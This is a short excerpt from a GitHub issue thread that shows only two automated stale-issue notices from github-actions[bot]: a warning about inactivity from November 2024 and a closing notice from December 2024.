This issue has been left open with no activity for a while now.

We get a lot of issues, so we currently close issues after 60 days of inactivity. It’s been at least 30 days since the last update here. If we missed this issue or if you want to keep it open, please reply here. You can also add the label "not stale" to keep this issue open!

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] avatar Nov 08 '24 15:11 github-actions[bot]

Hi again!

It’s been 60 days since anything happened on this issue, so we are going to close it. Please keep in mind that I’m only a robot, so if I’ve closed this issue in error please feel free to reopen this issue or create a new one if you need anything else.

As a friendly reminder: the best way to see this issue, or any other, fixed is to open a Pull Request.

github-actions[bot] avatar Dec 09 '24 15:12 github-actions[bot]